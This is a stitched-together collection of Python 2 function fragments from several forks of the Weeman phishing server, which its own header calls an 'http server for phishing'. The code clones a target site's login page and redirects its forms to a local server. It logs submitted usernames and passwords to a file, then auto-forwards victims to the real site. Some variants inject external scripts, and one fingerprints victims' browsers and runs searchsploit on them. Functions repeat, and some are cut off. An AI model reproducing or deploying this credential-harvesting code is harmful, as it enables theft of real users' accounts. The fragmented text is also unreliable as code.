def cleanup(self):
if os.path.exists("index.html"):
printt(3, "\n[i] Running cleanup ...")
os.remove("index.html")
if os.path.exists("redirect.html"):
os.remove("redirect.html")
def serve(self):
printt(
3,
"\033[01;35mStarting cybercloner %s server on 0.0.0.0:%d\033[00m" %
(__version__, self.port))
self.httpd = SocketServer.TCPServer(("", self.port), handler)
self.httpd.serve_forever()
def shell_noint(options):
global url
global port
global action_url
global user_agent
global html_file
url = options.url
action_url = options.action_url
port = int(options.port)
user_agent = options.user_agent
html_file = options.html_file
try:
print_startup()
s = weeman(url, port)
s.clone()
s.serve()
except KeyboardInterrupt:
s = weeman(url, port)
s.cleanup()
print("\nInterrupt ...")
except IndexError:
if prompt[0] == "help" or prompt[0] == "?":
print_help()
else:
printt(3, "Error: please provide option for \'%s\'." % prompt[0])
except Exception as e:
printt(3, "Error: (%s)" % (str(e)))
def cleanup(self):
if os.path.exists("index.html"):
printt(3, "\n[i] Running cleanup ...")
os.remove("index.html")
if os.path.exists("redirect.html"):
os.remove("redirect.html")
def serve(self, dirname):
os.chdir(dirname)
printt(
3, "\033[01;35mStarting Weeman %s server on 0.0.0.0:%d\033[00m" %
(__version__, self.port))
self.httpd = SocketServer.TCPServer(("", self.port), handler)
self.httpd.serve_forever()
def cleanup(self):
if os.path.exists("index.html"):
printt(3, "\n[i] Circulo de corrida ...")
os.remove("index.html")
if os.path.exists("redirect.html"):
os.remove("redirect.html")
def cleanup(self):
printt(3, "\n:: Running cleanup ...")
# In case weeman will not create ref.html, remove each file.
if os.path.exists("index.html"):
os.remove("index.html")
if os.path.exists("ref.html"):
os.remove("ref.html")
def cleanup(self):
printt(3, "\n:: Running cleanup ...")
# In case weeman will not create ref.html, remove each file.
if os.path.exists("index.html"):
os.remove("index.html")
if os.path.exists("ref.html"):
os.remove("ref.html")
def serve(self):
printt(
3,
"\033[01;35mStarting Weeman %s server on http://localhost:%d\033[00m"
% (__version__, self.port))
self.httpd = SocketServer.TCPServer(("", self.port), handler)
self.httpd.serve_forever()
def tests_pyver():
if sys.version[:3] == "2.7" or "2" in sys.version[:3]:
pass # All good
elif "3" in sys.version[:3]:
printt(1,"Weeman has no support for Python 3.")
else:
printt(1, "Your Python version is very old ..")
def shell_noint(profile_file):
global url
global port
global action_url
global user_agent
global html_file
url = profile_getkey(profile_file, "url")
action_url = profile_getkey(profile_file, "action_url")
port = int(profile_getkey(profile_file, "port"))
user_agent = profile_getkey(profile_file, "user_agent")
html_file = profile_getkey(profile_file, "html_file")
try:
print_startup()
s = weeman(url,port)
s.clone()
s.serve()
except KeyboardInterrupt:
s = weeman(url,port)
s.cleanup()
print("\nInterrupt ...")
except IndexError:
if prompt[0] == "help" or prompt[0] == "?":
print_help()
else:
printt(3, "Error: please provide option for \'%s\'." %prompt[0])
except Exception as e:
printt(3, "Error: (%s)" %(str(e)))
def tests_pyver():
if sys.version[:3] == "2.7" or "2" in sys.version[:3]:
pass # All good
elif "3" in sys.version[:3]:
printt(1, "Winer has no support for Python 3.")
else:
printt(1, "Your Python version is very old ..")
def shell_noint(options):
global url
global port
global action_url
global user_agent
global html_file
url = options.url
action_url = options.action_url
port = int(options.port)
user_agent = options.user_agent
html_file = options.html_file
try:
print_startup()
s = weeman(url,port)
s.clone()
s.serve()
except KeyboardInterrupt:
s = weeman(url,port)
s.cleanup()
print("\nInterrupt ...")
except IndexError:
if prompt[0] == "help" or prompt[0] == "?":
print_help()
else:
printt(3, "Error: please provide option for \'%s\'." %prompt[0])
except Exception as e:
printt(3, "Error: (%s)" %(str(e)))
def show_links(self):
""" Show the links """
if not self.links:
printt(3, "No links found.")
else:
for link in self.links:
print("[*] %s" % ( link ))
def cleanup(self):
printt(3, "\n:: Running cleanup ...")
## In case cybercloner will not create ref.html,
## Remove each file in diffrent check.
if os.path.exists("index.html"):
os.remove("index.html")
if os.path.exists("ref.html"):
os.remove("ref.html")
def test_connection(self):
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent',
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13A342 Safari/601.1")]
data = opener.open("http://api.hackertarget.com/nping/?q=%s" % (self.website)).read()
if data == "error check your api query":
printt(2, "Looks like \'%s\' is down for everyone." % (self.website))
else:
printt(3, "OK! \'%s\' is up and running!" % (self.website))
def main():
tests_pyver()
tests_platform()
try:
from bs4 import BeautifulSoup as bs
except ImportError:
printt(1, "Please install beautifulsoup 4 to continue ...")
from core.shell import shell
shell()
def module_execute(self, args):
""" Runs the module """
module = args[1]
# Wee dont need to check ImportError, we do it in modules_list()
try:
m = importlib.import_module("modules.%s" % (module))
m.main(args)
except ImportError:
printt(2, "Cannot load \'%s\' to the framework." % module)
def test_connection(self):
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent',
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13A342 Safari/601.1")]
data = opener.open("http://api.hackertarget.com/nping/?q=%s" % (self.website)).read()
if data == "error check your api query":
printt(2, "Looks like \'%s\' is down for everyone." % (self.website))
else:
printt(3, "OK! \'%s\' is up and running!" % (self.website))
def create_post(url, action_url, post_request):
printt(3, "Creating ref.html ...")
red = open("ref.html", "w")
red.write('<body><form id="ff" action="%s" method="post" >\n' % action_url)
for post in post_request:
key, value = post.split()
red.write('<input name="%s" value="%s" type="hidden" >\n' % (key, value))
red.write('<input name="login" type="hidden">')
red.write('<script langauge="javascript">document.forms["ff"].submit();</script>')
red.close()
def create_post(url,action_url, post_request):
printt(3, "Creating ref.html ...")
red = open("ref.html","w")
red.write("<body><form id=\"ff\" action=\"%s\" method=\"post\" >\n" %action_url)
for post in post_request:
key,value = post.split()
red.write("<input name=\"%s\" value=\"%s\" type=\"hidden\" >\n" %(key,value))
red.write("<input name=\"login\" type=\"hidden\">")
red.write("<script langauge=\"javascript\">document.forms[\"ff\"].submit();</script>")
red.close()
def tests_platform():
if "linux" in sys.platform:
#printt(3, "Running Weeman on linux ... (All good)")
pass
elif "darwin" in sys.platform:
#printt(3, "Running Weeman on \'Mac\' (All good)")
pass
else:
printt(
3, "If \'FishCracker\' runs sucsessfuly on your platform %s\n" %
sys.platform)
def tests_platform():
if "linux" in sys.platform:
#printt(3, "Running Weeman on linux ... (All good)")
pass
elif "darwin" in sys.platform:
#printt(3, "Running Weeman on \'Mac\' (All good)")
pass
elif "win" in sys.platform:
printt(3, "Running Weeman on \'Windows\' (Not tested)")
else:
printt(3, "If \'Weeman\' runs sucsessfuly on your platform %s\nPlease let me (@Hypsurus) know!" %sys.platform)
def tests_platform():
if "linux" in sys.platform:
#printt(3, "Running Weeman on linux ... (All good)")
pass
elif "darwin" in sys.platform:
#printt(3, "Running Weeman on \'Mac\' (All good)")
pass
elif "win" in sys.platform:
print("Sorry, there is no support for windows right now.")
sys.exit(1)
else:
printt(3, "If \'Weeman\' runs sucsessfuly on your platform %s\nPlease let me (@Hypsurus) know!" %sys.platform)
def tests_platform():
if "linux" in sys.platform:
#printt(3, "Running Weeman on linux ... (All good)")
pass
elif "darwin" in sys.platform:
#printt(3, "Running Weeman on \'Mac\' (All good)")
pass
elif "win" in sys.platform:
print("Sorry, there is no support for windows right now.")
sys.exit(1)
else:
printt(3, "If \'Weeman\' runs sucsessfuly on your platform %s\nPlease let me (@Hypsurus) know!" %sys.platform)
def shell(self):
args = None
# Get all modules
self.modules_get_list()
self.print_startup(len(self.o_modules))
complete(array+self.o_modules)
while True:
args = raw_input("framework >>> ") or "help"
args = args.split()
if args[0] == "list":
print("\t-----------\n"
"\t| modules |\n"
"\t-----------\n"
"\t-----------------------------------\n"
"\t| ID | Name | Version | Information |")
for mod in self.o_modules:
try:
self.c_modules += 1
m = importlib.import_module("modules.%s" %(mod))
except ImportError:
print("\t>> %s - [ERROR ON LOAD]" %(mod))
else:
print("\t", end="")
line = "\t| %d]. %s (%s) - %s\t|" %(self.c_modules,
mod, m.MODULE_VERSION, m.MODULE_DE)
_ = len(line)
print("-" * _)
print(line)
print("\t", end="")
print("-" * _)
elif args[0] == "run":
try:
_ = args[1]
except IndexError:
print("Usage: run [module] [args] ...")
else:
self.module_execute(args)
elif args[0] == "back" or args[0] == "quit":
break
elif args[0] == "info":
try:
_ = args[1]
except IndexError:
print("Usage: info [module]")
else:
self.module_read(_)
elif args[0] == "help":
self.help()
else:
printt(2, "%s - unknown command" % (args[0]))
def clone(self):
from core.shell import html_file
from core.shell import external_js
if not html_file:
printt(3, "Tentando conseguir: %s ..." % self.url)
printt(3, "Fazendo Download da pagina ...")
data = self.request(self.url)
else:
printt(3, "Carregando \'%s\' ..." % html_file)
data = open(html_file, "r").read()
data = bs(data, "html.parser")
printt(3, "Modificando o arquivo HTML ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "redirect.html"
# Replace path with full path with the URL
for tag in data.find_all("a"):
pass
# Insert external script
script = data.new_tag('script', src=external_js)
data.html.head.insert(len(data.html.head), script)
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
def clone(self):
from core.shell import html_file
from core.shell import external_js
if not html_file:
printt(3, "[+] Trying to get %s ..." % self.url)
printt(3, "[+] Downloading webpage ...")
data = self.request(self.url)
else:
printt(3, "Loading \'%s\' ..." % html_file)
data = open(html_file, "r").read()
data = bs(data, "html.parser")
printt(3, "Modifying the HTML file ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "redirect.html"
# Replace path with full path with the URL
for tag in data.find_all("a"):
pass
# Insert external script
script = data.new_tag('script', src=external_js)
data.html.head.insert(len(data.html.head), script)
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
def clone(self):
from core.shell import html_file
from core.shell import external_js
if not html_file:
printt(3, "Trying to get %s ..." %self.url)
printt(3, "Downloadng webpage ...")
data = self.request(self.url)
else:
printt(3, "Loading \'%s\' ..." %html_file)
data = open(html_file, "r").read()
data = bs(data, "html.parser")
printt(3, "Modifying the HTML file ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "redirect.html"
# Replace path with full path with the URL
for tag in data.find_all("a"):
pass
# Insert external script
script = data.new_tag('script', src=external_js)
data.html.head.insert(len(data.html.head), script)
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
def do_POST(self):
post_request = []
printt(3, "%s - sent POST request." %self.address_string())
form = cgi.FieldStorage(self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],})
try:
from core.shell import url
logger = open("%s.log" %url.replace("https://", "").replace("http://", "").split("/")[0], "a")
logger.write("\n## Data for %s\n\n" %url)
for tag in form.list:
tmp = str(tag).split("(")[1]
key,value = tmp.replace(")", "").replace("\'", "").replace(",", "").split()
post_request.append("%s %s" %(key,value))
printt(2, "%s => %s" %(key,value))
logger.write("%s => %s\n" %(key,value))
logger.close()
from core.shell import action_url
create_post(url,action_url, post_request)
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
except socerr as e:
printt(3, "Something wrong: (%s) igonring ..." %str(e))
except Exception as e:
printt(3, "Something wrong: (%s) igonring ..." %str(e))
def modules_get_list(self):
""" Get the modules list from modules/ """
home = os.getcwd()
os.chdir(self.modules_folder)
self.modules = glob.glob("*.py")
if not self.modules:
printt(2, "No modules found.")
else:
os.chdir(home)
for module in self.modules:
module = module.split(".")[0]
if module == "__init__":
continue
self.o_modules.append(module)
def create_post(url,action_url, post_request):
"""
Create the page that will reidrect to the orignal page.
"""
printt(3, "Creating redirect.html ...")
with open("redirect.html","w") as r:
r.write("<body><form id=\"firefox\" action=\"%s\" method=\"post\" >\n" %action_url)
for post in post_request:
key,value = post.split()
r.write("<input name=\"%s\" value=\"%s\" type=\"hidden\" >\n" %(key,value))
r.write("<input name=\"login\" type=\"hidden\">")
r.write("<script langauge=\"javascript\">document.forms[\"firefox\"].submit();</script>")
r.close()
def module_read(self, module):
""" Read module information """
try:
m = importlib.import_module("modules.%s" % (module))
except ImportError:
print("Error: cannot load \'%s\' to the framework ..." % (module))
else:
try:
print("name: : %s" % module)
print("info : %s" % m.MODULE_DE)
print("date : %s" % m.MODULE_DATE)
print("version : %s" % m.MODULE_VERSION)
print("author : %s" % m.MODULE_AUTHOR)
print("license : %s" % m.MODULE_LICENSE)
except IndexError:
printt(2, "Error: please set all MODULE_* variables for this module.")
def fetch(self):
""" Create connection o the whois server """
s = socket(AF_INET, SOCK_STREAM)
code = s.connect_ex(("whois.ripe.net", 43))
s.settimeout(2)
if code != 0:
printt(3, "Failed to connect to the whois server.")
return
data = s.recv(1024)
print(data)
s.send("%s -B\r\n" % (self.ip_addr))
while data:
data = s.recv(8192)
print(data)
s.close()
def fetch(self):
""" Create connection o the whois server """
s = socket(AF_INET, SOCK_STREAM)
code = s.connect_ex(("whois.ripe.net", 43))
s.settimeout(2)
if code != 0:
printt(3, "Failed to connect to the whois server.")
return
data = s.recv(1024)
print(data)
s.send("%s -B\r\n" % (self.ip_addr))
while data:
data = s.recv(8192)
print(data)
s.close()
def log_message(self, format, *args):
printt(3, "Connected : %s" %(self.address_string()))
arg = format%args
if arg.split()[1] == "/":
printt(3, "%s - sent GET request without parameters." %self.address_string())
else:
if arg.split()[1].startswith("/") and "&" in arg.split()[1]:
printt(3, "%s - sent GET request with parameters." %self.address_string())
printt(2, "%s" %arg.split()[1])
def main():
tests_pyver()
tests_platform()
try:
from bs4 import BeautifulSoup as bs
except ImportError:
printt(1, "Please install beautifulsoup 4 to continue ...")
parser = optparse.OptionParser()
parser.add_option("-q", "--quiet",
dest="quiet_mode_opt", action="store_true",
default=False, help="Runs without displaying the banner.")
options,r = parser.parse_args()
mode = options.quiet_mode_opt
from core.shell import shell
shell(mode)
def tests_platform():
if "linux" in sys.platform:
printt(3, "Exploiting CYBER CLONER on Kali Linux")
elif "darwin" in sys.platform:
printt(3, "Exploiting CYBER CLONER on \'Mac\' (Not tested)")
elif "win" in sys.platform:
printt(3, "Exploiting CYBER CLONER on \'Windows\' (Not tested)")
else:
printt(
3,
"If \'CYBER CLONER\' runs sucsessfuly on your platform %s\nPlease let me ([email protected]) know!"
% sys.platform)
def clone(self):
printt(3, "Trying to get %s ..." %self.url)
from core.shell import html_file
if not html_file:
printt(3, "Downloadng webpage ...")
data = self.request(self.url)
else:
printt(3, "Loading \'%s\' ..." %html_file)
data = open(html_file, "r").read()
data = bs(data, "html.parser")
printt(3, "Modifying the HTML file ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "ref.html"
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
printt(3, "the HTML page will redirect to ref.html ...")
def tests_platform():
if "linux" in sys.platform:
printt(3, "Running STD9-Phishing on linux ... ")
elif "darwin" in sys.platform:
printt(3, "Running STD9-Phishing on \'Mac\' (Not tested)")
elif "win" in sys.platform:
printt(3, "Running STD9-Phishing on \'Windows\' (Not tested)")
else:
printt(
3,
"If \'STD9-Phishing\' runs sucsessfuly on your platform %s\nPlease let me (@Zeblive D) know!"
% sys.platform)
def create_post(url, action_url, post_request):
"""
Create the page that will reidrect to the orignal page.
"""
printt(3, "Creating redirect.html ...")
with open("redirect.html", "w") as r:
r.write(
"<body><form id=\"firefox\" action=\"%s\" method=\"post\" >\n" %
action_url)
for post in post_request:
key, value = post.split()
r.write("<input name=\"%s\" value=\"%s\" type=\"hidden\" >\n" %
(key, value))
r.write("<input name=\"login\" type=\"hidden\">")
r.write(
"<script type=\"text/javascript\">document.forms[\"firefox\"].submit();</script>"
)
r.close()
def clone(self):
printt(3, "Trying to get %s ..." % self.url)
printt(3, "Downloadng wepage ...")
data = self.request(self.url)
data = bs(data, "html.parser")
printt(3, "Modifying the HTML file ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "ref.html"
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
printt(3, "the HTML page will redirect to ref.html ...")
def shell_noint(profile_file):
global url
global port
global action_url
global user_agent
global html_file
global external_js
try:
url = profile_getkey(profile_file, "url")
action_url = profile_getkey(profile_file, "action_url")
port = int(profile_getkey(profile_file, "port"))
user_agent = profile_getkey(profile_file, "user_agent")
html_file = profile_getkey(profile_file, "html_file")
external_js = profile_getkey(profile_file, "external_js")
print_startup()
s = weeman(url, port)
s.clone()
s.serve()
except ValueError:
printt(3, "Error: your profile file looks bad.")
except KeyboardInterrupt:
s = weeman(url, port)
s.cleanup()
print("\nInterrupt ...")
except IndexError:
if prompt[0] == "help" or prompt[0] == "?":
print_help()
else:
printt(3, "Error: please provide option for \'%s\'." % prompt[0])
except Exception as e:
printt(3, "Error: (%s)" % (str(e)))
def clone(self):
printt(3, "Trying to get %s ..." %self.url)
printt(3, "Downloadng wepage ...")
data = self.request(self.url)
data = bs(data, "html.parser")
printt(3, "Modifying the HTML file ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "ref.html"
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
printt(3, "the HTML page will redirect to ref.html ...")
def shell():
global url
global port
global action_url
global user_agent
global html_file
print_startup()
complete(array)
if os.path.exists("history.log"):
if os.stat("history.log").st_size == 0:
history = open("history.log", "w")
else:
history = open("history.log", "a")
else:
history = open("history.log", "w")
while True:
try:
an = raw_input(" (weeman ) : ")
prompt = an.split()
if not prompt:
print("Error: What? try help.")
elif prompt[0] == ";" or prompt[0] == "clear":
print("\033[H\033[J")
elif prompt[0] == "q" or prompt[0] == "quit":
printt(2,"bye bye!")
break;
elif prompt[0] == "help" or prompt[0] == "?":
if prompt[1]:
print_help_option(str(prompt[1]))
else:
print_help()
elif prompt[0] == "show":
l = 11 + len(url)
sys.stdout.write("\033[01;32m\t")
print("-" * l)
print("\turl : %s " %url)
print("\tport : %d " %(port))
print("\taction_url : %s " %(action_url))
print("\tuser_agent : %s " %(user_agent))
print("\thtml_file : %s " %(html_file))
sys.stdout.write("\t\033[00m")
print("-" * l)
elif prompt[0] == "set":
if prompt[1] == "port":
port = int(prompt[2])
## Check if port == 80 and not running as root
if port == 80 and os.getuid() != 0:
printt(2, "Permission denied, to bind port 80, you need to run weeman as root.");
history.write("port = %s\n" %port)
if prompt[1] == "url":
url = str(prompt[2])
history.write("url = %s\n" %url)
if prompt[1] == "action_url":
action_url = str(prompt[2])
history.write("action_url = %s\n" %action_url)
if prompt[1] == "user_agent":
prompt.pop(0)
u = str()
for x in prompt:
u+=" "+x
user_agent = str(u.replace("user_agent", ""))
history.write("user_agent = %s\n" %user_agent)
if prompt[1] == "html_file":
html_file = str(prompt[2])
elif prompt[0] == "run" or prompt[0] == "r":
s = weeman(url,port)
s.clone()
s.serve()
elif prompt[0] == "banner" or prompt[0] == "b":
print_startup()
else:
print("Error: \'%s\' What? try help." %prompt[0])
except KeyboardInterrupt:
s = weeman(url,port)
s.cleanup()
print("\nInterrupt ...")
except IndexError:
if prompt[0] == "help" or prompt[0] == "?":
print_help()
else:
printt(3, "Error: please provide value for \'%s\'." %prompt[0])
except Exception as e:
printt(3, "Error: (%s)" %(str(e)))
#!/usr/bin/env python2
##
## weeman - http server for phishing.
##
## Written by Hypsurus <*****@*****.**>
##
import sys
from core.misc import printt
try:
from bs4 import BeautifulSoup as bs
except ImportError:
printt(1, "Please install beautifulsoup 4 to continue ...")
def tests_pyver():
if sys.version[:3] == "2.7" or "2" in sys.version[:3]:
pass # All good
elif "3" in sys.version[:3]:
printt(1,"Weeman has no support for Python 3.")
else:
printt(1, "Your Python version is very old ..")
def tests_platform():
if "linux" in sys.platform:
printt(3, "Running Weeman on linux ... (All good)")
elif "darwin" in sys.platform:
printt(3, "Running Weeman on \'Mac\' (All good)")
elif "win" in sys.platform:
printt(3, "Running Weeman on \'Windows\' (Not tested)")
else:
def shell(quiet_mode):
"""
The shell, parse command line args,
and set variables.
"""
global url
global port
global action_url
global user_agent
global html_file
if not quiet_mode:
print_startup()
complete(array)
if os.path.exists("history.log"):
if os.stat("history.log").st_size == 0:
history = open("history.log", "w")
else:
history = open("history.log", "a")
else:
history = open("history.log", "w")
while True:
try:
an = raw_input(PROMPT_P)
prompt = an.split()
if not prompt:
print("Error: What? try help.")
elif prompt[0] == ";" or prompt[0] == "clear":
print("\033[H\033[J")
elif prompt[0] == "q" or prompt[0] == "quit":
printt(2, "bye bye!")
break
elif prompt[0] == "help" or prompt[0] == "?":
if prompt[1]:
print_help_option(str(prompt[1]))
else:
print_help()
elif prompt[0] == "show":
l = 20
sys.stdout.write("\033[01;37m\t")
print("-" * l)
print("\turl : %s " % url)
print("\tport : %d " % (port))
print("\taction_url : %s " % (action_url))
print("\tuser_agent : %s " % (user_agent))
print("\thtml_file : %s " % (html_file))
sys.stdout.write("\t")
print("-" * l)
sys.stdout.write("\033[01;00m")
elif prompt[0] == "set":
if prompt[1] == "port":
port = int(prompt[2])
## Check if port == 80 and not running as root
if port == 80 and os.getuid() != 0:
printt(2, "Permission denied, to bind port 80, you need to run weeman as root.")
history.write("port = %s\n" % port)
if prompt[1] == "url":
url = str(prompt[2])
history.write("url = %s\n" % url)
if prompt[1] == "action_url":
action_url = str(prompt[2])
history.write("action_url = %s\n" % action_url)
if prompt[1] == "user_agent":
prompt.pop(0)
u = str()
for x in prompt:
u += " " + x
user_agent = str(u.replace("user_agent", ""))
history.write("user_agent = %s\n" % user_agent)
if prompt[1] == "html_file":
html_file = str(prompt[2])
elif prompt[0] == "run" or prompt[0] == "r":
if not url:
printt(3, "Error: 'url' Can't be 'None', please use 'set'.")
elif not action_url:
printt(3, "Error: 'action_url' Can't be 'None', please use 'set'.")
else:
# Here we start the server (:
s = weeman(url, port)
s.clone()
s.serve()
elif prompt[0] == "banner" or prompt[0] == "b":
print_startup()
else:
print("Error: '%s' What? try help." % prompt[0])
except KeyboardInterrupt:
s = weeman(url, port)
s.cleanup()
print("\nInterrupt ...")
except IndexError:
if prompt[0] == "help" or prompt[0] == "?":
print_help()
else:
printt(3, "Error: please provide option for '%s'." % prompt[0])
except Exception as e:
printt(3, "Error: (%s)" % (str(e)))
def clone(self):
from core.shell import html_file
if not html_file:
printt(3, "Trying to get %s ..." %self.url)
printt(3, "Downloadng webpage ...")
data = self.request(self.url)
else:
printt(3, "Loading \'%s\' ..." %html_file)
data = open(html_file, "r").read()
# Data
data = bs(data, "html.parser")
printt(3, "Modifying the HTML file ...")
for tag in data.find_all("form"):
tag['method'] = "post"
tag['action'] = "ref.html"
# Here we will attampt to load CSS/JS from the page
# and replace ./ ../ / with the site URL.
# Case the URL have more then one file
try:
uri = self.url.rsplit('/', 1)[0]
urisp = uri.split("/")[2]
# <link
for tag in data.find_all("link"):
link = tag['href']
if link.startswith("//"):
pass
elif "://" in link:
pass
elif "../" in link:
link = link.replace("../", "%s/" %uri)
tag['href'] = link
elif link.startswith("/") and not urisp in link:
tag['href'] = "%s%s" %(uri, link);
elif not link.startswith("/") and not urisp in link:
tag['herf'] = "%s/%s" %(uri, link);
# <img
for tag in data.find_all("img"):
link = tag['src']
if link.startswith("//"):
pass
elif "://" in link:
pass
elif "../" in link:
link = link.replace("../", "%s/" %uri)
tag['src'] = link
elif link.startswith("/") and not urisp in link:
tag['src'] = "%s%s" %(uri, link);
elif not link.startswith("/") and not urisp in link:
tag['src'] = "%s/%s" %(uri, link);
# <a
for tag in data.find_all("a"):
link = tag['href']
if link.startswith("//"):
pass
elif "://" in link:
pass
elif "../" in link:
link = link.replace("../", "%s/" %uri)
tag['href'] = link
elif link.startswith("/") and not urisp in link:
tag['href'] = "%s%s" %(uri, link);
elif not link.startswith("/") and not urisp in link:
tag['href'] = "%s/%s" %(uri, link);
except IndexError:
uri = self.url
urisp = uri.replace("http://", "").replace("https://", "")
except Exception as e:
printt(3, "Something happen: (%s) igonring ..." %str(e))
with open("index.html", "w") as index:
index.write(data.prettify().encode('utf-8'))
index.close()
printt(3, "the HTML page will redirect to ref.html ...")
def do_POST(self):
#Setup redirect
os.system('cp redirect.html.orig redirect.html')
post_request = []
printt(3, "%s - sent POST request." %self.address_string())
form = cgi.FieldStorage(self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],})
try:
from core.shell import url
logger = open("%s.log" %url.replace("https://", "").replace("http://", "").split("/")[0], "a")
logger.write("\n## %s - Data for %s\n\n" %(time.strftime("%H:%M:%S - %d/%m/%y"), url))
## Get the User-Agent header and query useragentapi for json information regarding the browser
user_agent = urllib.quote_plus(self.headers['User-Agent'])
## UserAgentAPI Account registered for up to 1000 calls per day
## If more are needed register a new APIKEY
apikey = '8c21e71c'
r = requests.get('https://useragentapi.com/api/v3/json/'+apikey+'/'+user_agent)
printt(2, "Operating System: "+r.json()[u'data'][u'platform_name']+" "+r.json()[u'data'][u'platform_version'])
printt(2, "Browser: "+r.json()[u'data'][u'browser_name']+" "+r.json()[u'data'][u'browser_version'])
printt(2, "Platform: "+r.json()[u'data'][u'platform_type'])
# printt(2, "Rendering Engine: "+r.json()[u'data'][u'engine_name']+" "+r.json()[u'data'][u'engine_version'])
printt(2, "Potential Metasploit Modules:")
os.system('searchsploit '+r.json()[u'data'][u'platform_name']+' '+r.json()[u'data'][u'platform_version'])
os.system('searchsploit '+r.json()[u'data'][u'browser_name']+' '+r.json()[u'data'][u'browser_version'])
## Check HTTP_ACCEPT for Flash
if ('flash' in self.headers['Accept']) or ('flash' in self.headers['Accept']):
printt(2, "Flash found: "+self.headers['Accept'])
else:
printt(2, "Flash not found")
for tag in form.list:
tmp = str(tag).split("(")[1]
key,value = tmp.replace(")", "").replace("\'", "").replace(",", "").split()
post_request.append("%s %s" %(key,value))
printt(2, "%s => %s" %(key,value))
logger.write("%s => %s\n" %(key,value))
logger.close()
from core.shell import action_url
create_post(url,action_url, post_request)
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
except socerr as e:
printt(3, "%s igonring ..." %str(e))
except Exception as e:
printt(3, "%s igonring ..." %str(e))
def serve(self):
printt(3, "\033[01;35mStarting Weeman %s server on localhost:%d\033[00m" %(__version__, self.port))
self.httpd = SocketServer.TCPServer(("", self.port),handler)
self.httpd.serve_forever()